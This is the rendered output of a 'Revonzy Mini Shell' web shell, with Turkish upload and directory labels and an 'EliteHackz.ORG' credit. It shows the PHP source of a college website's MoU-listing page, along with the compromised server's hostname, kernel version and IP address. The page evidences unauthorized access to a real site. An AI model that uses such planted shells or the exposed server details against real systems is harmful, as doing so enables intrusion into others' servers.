Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/lbpmsolapur.org/mous.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	require_once("admin/lib/functions.php");
	$db = new login_function();
?>
<DOCTYPE html>
<html>
<head>
    <link href="css/style.css" rel="stylesheet" type="text/css" media="all" />
    
	<title>Laxmibai Bhaurao Patil Mahila Mahavidyalaya</title>
	
	<style>
	table a:link {
	color: #666;
	font-weight: bold;
	text-decoration:none;
}
table a:visited {
	color: #999999;
	font-weight:bold;
	text-decoration:none;
}
table a:active,
table a:hover {
	color: #bd5a35;
	text-decoration:underline;
}
table {
width:100%;
	font-family:Arial, Helvetica, sans-serif;
	color:#666;
	font-size:12px;
	<!--text-shadow: 1px 1px 0px #fff;-->
	background:#eaebec;
	margin:20px;
	border:black 1px solid;

	-moz-border-radius:3px;
	-webkit-border-radius:3px;
	border-radius:3px;

	-moz-box-shadow: 0 1px 2px #d1d1d1;
	-webkit-box-shadow: 0 1px 2px #d1d1d1;
	box-shadow: 0 1px 2px #d1d1d1;
}
table th {
	padding:21px 25px 22px 25px;
	border-top:1px solid #fafafa;
	border-bottom:1px solid #e0e0e0;

	background: #ededed;
	background: -webkit-gradient(linear, left top, left bottom, from(#ededed), to(#ebebeb));
	background: -moz-linear-gradient(top,  #ededed,  #ebebeb);
}
table th:first-child {
	text-align: left;
	padding-left:20px;
}
table tr:first-child th:first-child {
	-moz-border-radius-topleft:3px;
	-webkit-border-top-left-radius:3px;
	border-top-left-radius:3px;
}
table tr:first-child th:last-child {
	-moz-border-radius-topright:3px;
	-webkit-border-top-right-radius:3px;
	border-top-right-radius:3px;
}
table tr {
	text-align: center;
	padding-left:20px;
}
table td:first-child {
	text-align: left;
	padding-left:20px;
	border-left: 0;
}
table td {
	padding:18px;
	border-top: 1px solid #ffffff;
	border-bottom:1px solid #e0e0e0;
	border-left: 1px solid #e0e0e0;

	background: #fafafa;
	background: -webkit-gradient(linear, left top, left bottom, from(#fbfbfb), to(#fafafa));
	background: -moz-linear-gradient(top,  #fbfbfb,  #fafafa);
}
table tr.even td {
	background: #f6f6f6;
	background: -webkit-gradient(linear, left top, left bottom, from(#f8f8f8), to(#f6f6f6));
	background: -moz-linear-gradient(top,  #f8f8f8,  #f6f6f6);
}
table tr:last-child td {
	border-bottom:0;
}
table tr:last-child td:first-child {
	-moz-border-radius-bottomleft:3px;
	-webkit-border-bottom-left-radius:3px;
	border-bottom-left-radius:3px;
}
table tr:last-child td:last-child {
	-moz-border-radius-bottomright:3px;
	-webkit-border-bottom-right-radius:3px;
	border-bottom-right-radius:3px;
}
table tr:hover td {
	background: #f2f2f2;
	background: -webkit-gradient(linear, left top, left bottom, from(#f2f2f2), to(#f0f0f0));
	background: -moz-linear-gradient(top,  #f2f2f2,  #f0f0f0);	
}
	</style>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
</head>
<body>	
	
	<?php
		require_once("lib/header.php");
	?>
		
	<div name="tab_container">
		<div class="main_container" style="min-height:610px;">
		
		<div class="page_highlighter" style="background-color:orange">Commitee</div>
		
			
			<div class="data_container" style="margin-top:16px; min-height:700px;">
					
<div>
	<?php
		// $details	=	$db->activity_title_name();		
		if(!empty($details))
			{
				$counter	=	0;
				
		 		foreach($details as $record)
				{
					$id				=	$details[$counter][0];
					$name			=	$details[$counter][1];
				?>
			<table style="margin:auto;margin-top:20px; border:1px solid black" cellpadding="5" cellspacing="0" >												
					<thead>
						
						<tr>
							<th colspan="6" style="border:black;text-align:center;color:white;font-size:18px;background:#E91546"><?php echo $name; ?></th>
						</tr>							
					</thead>	
				<?php	
					$activity_added	=	$db->get_activity_data($id);
					
					if(!empty($activity_added))
					{
						$counter1	=	0;
						foreach($activity_added as $record1)									
						{
							$added_id		=	$activity_added[$counter1][0];
							$got_title_id	=	$activity_added[$counter1][1];
							$got_data		=	$activity_added[$counter1][2];
							$got_image		=	$activity_added[$counter1][3];
							$got_date		=	$activity_added[$counter1][4];
							$got_time		=	$activity_added[$counter1][5];
						
						if($got_image=="")	
						{
					?>									
						<tr>
							<td style="border:1px solid black;width:750;font-size:13px;line-height:20px;"><b><?php echo $got_data; ?></b></td>
						</tr>	
					<?php
						}
						if($got_data=="")
						{
					?>	
						<tr >
							<td style="border:1px solid black"><img src="img/activity/<?php echo $got_image; ?>" class="icons_imgs" height="250" width="500" style="float:none;margin-left:180px;width:300px;border:1px solid grey" /></td>
						</tr>
					<?php	
						}
						else if($got_data!="" AND $got_image!="")
						{
					?>
						<tr>
							<td style="border:1px solid black" width="750"><b><?php echo $got_data; ?></b></td>
							<tr><td style="border:1px solid black"><img src="img/activity/<?php echo $got_image; ?>" class="icons_imgs" height="250" width="500" style="float:none; width:300px;margin-left:180px;border:1px solid grey" /></td></tr>
						</tr>
							
					<?php	
						}
					?>
						</tr>	
					<?php	
							$counter1++;
						}
					}	
				?>
						</table>			
				<?php
					$counter++;
				}
				
			}
			else
			{
		?>
		<?php
			}
		?>
	<html>
	<head>

		<title>
		Mous - LBPM
		</title>
	</head>
	<body>
    
    <center><h2><em><span style="color:red;font-size:20px;">FACULTY EXCHANGE MOUs</span></em></h2>
<br />

	</br>
  <style>
        table {
            width: 136%;
            border-collapse: collapse; 
            margin-top: 20px;
            border: 2px solid #666;  text-align: justify;
        }
        th, td {
            border: 1px solid #666; 
            padding: 8px;
            text-align: left;
            color: black;
            text-align: justify;
        }
        th {
            background-color: #f2f2f2; 
        }
        a {
            color: #1a73e8; /* Link color */
            text-decoration: none;
        }
        a:hover {
            text-decoration: underline; /* Underline on hover */
        }
    </style>
	
	<table>
    <thead>
        <tr>
            <th>Sr. No.</th>
            <th>MoU’s  College Name</th>
        </tr>
    </thead>
    <tbody>
        <tr>
            <td>1.</td>
             <td style=" text-align: justify;">D.A.V. Velankar College of Commerce, Solapur.</td>
        </tr>
        <tr>
            <td>2.</td>
            <td style=" text-align: justify;">Sangmeshwar College, Solapur.</td>
        </tr>
        <tr>
            <td>3.</td>
           <td style=" text-align: justify;">DBF Dayanand College of Arts and Science, Solapur.</td>
        </tr>
            <tr>
            <td>4.</td>
           <td style=" text-align: justify;">Farm seeds Agro Solapur.</td>
        </tr>
          <tr>
            <td>5.</td>
           <td style=" text-align: justify;">Hirachand Nemchand College of Commerce, Solapur.</td>
        </tr>
         <tr>
            <td>6.</td>
          <td style=" text-align: justify;">Mauli Mahavidyalaya, Wadala, North Solapur.</td>
        </tr>
         <tr>
            <td>7.</td>
         <td style=" text-align: justify;">Maharashtra Centre for Entrepreneurship Development (MCED), C/O District Industries Centre, Solapur.</td>
        </tr>
         <tr>
            <td>8.</td>
            <td style=" text-align: justify;" >Vasundhara Arts and Science College, Solapur.</td>
        </tr>
         <tr>
            <td>9.</td>
        <td style=" text-align: justify;">Shri Nitin Krushnanand Anvekar ,(History Researcher) Solapur.</td>
        </tr>
          <tr>
            <td>10.</td>
       <td style=" text-align: justify;">Bharti Vidyapeeth-Abhijit Kadam Institute of Management and Social Science (AKIMSS) Solapur.</td>
        </tr>
          <tr>
            <td>11.</td>
            <td style=" text-align: justify;">Consumer Guidance Society of India (CGSI), Mumbai.</td>
        </tr>
         <tr>
            <td>12.</td>
            <td style=" text-align: justify;">Elixir Skill Academy.</td>
        </tr>
         <tr>
            <td>13.</td>
            <td style=" text-align: justify;">Family Planning Association of India, Solapur Branch.</td>
        </tr>
         <tr>
            <td>14.</td>
            <td style=" text-align: justify;">Dr. Hedgewar Blood Bank, Solapur.</td>
        </tr>
         <tr>
            <td>15.</td>
            <td style=" text-align: justify;">Lokmangal Science and Entrepreneurship College, Wadala.</td>
        </tr>
         <tr>
            <td>16.</td>
            <td style=" text-align: justify;">Sports Officer, Solapur Municipal Corporation Solapur.</td>
        </tr>
          <tr>
            <td>17.</td>
            <td style=" text-align: justify;">Solapur Social Association’s Arts and Commerce College, Solapur.</td>
        </tr>
          <tr>
            <td>18.</td>
            <td style=" text-align: justify;">V. G. Shivdare College of Arts , Commerce and Science Solapur.</td>
        </tr>
         <tr>
            <td>19.</td>
            	<td style=" text-align: justify;">A.R. Burla Mahila Varishta Mahavidyalaya,, Solapur.</td>
        </tr>
          <tr>
            <td>20.</td>
            <td style=" text-align: justify;">Kamini Gandhi Institute, Solapur.</td>
        </tr>
          <tr>
            <td>21.</td>
            <td style=" text-align: justify;">Dhiraj R. Jawalkar Chartered Accountant, Solapur.</td>
        </tr>
         <tr>
            <td>22.</td>
            <td style=" text-align: justify;">Laxmi Drucken Komponent Pvt. Ltd Solapur.</td>
        </tr>
         <tr>
            <td>23.</td>
            <td style=" text-align: justify;">Karmaveer Bhaurao Patil Mahavidyalaya, Pandarpur.</td>
        </tr>
          <tr>
            <td>24.</td>
           <td style=" text-align: justify;">Matoshri Gurubasavva Kalayanshetti Mahavidyalaya, Akkalkot.</td>
        </tr>
           <tr>
            <td>25.</td>
           <td style=" text-align: justify;">Prin.K.P Mangalvedekar Institute of Management Career Development and Research, Solapur.</td>
        </tr>
        <!-- You can add more rows here if needed -->
    </tbody>
</table>

	<style>
		.commitee-table
		{
		border-collapse:collapse;
		margin:auto;
		border:1px solid #ccc;
		font-size:15px;
		text-align:left;
	
		}
		.commitee-table tr td{
		   text-align:left;
		}
		
	</style>
	
				
</div>	
	
	</div>
			
	<?php
		require_once("lib/footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4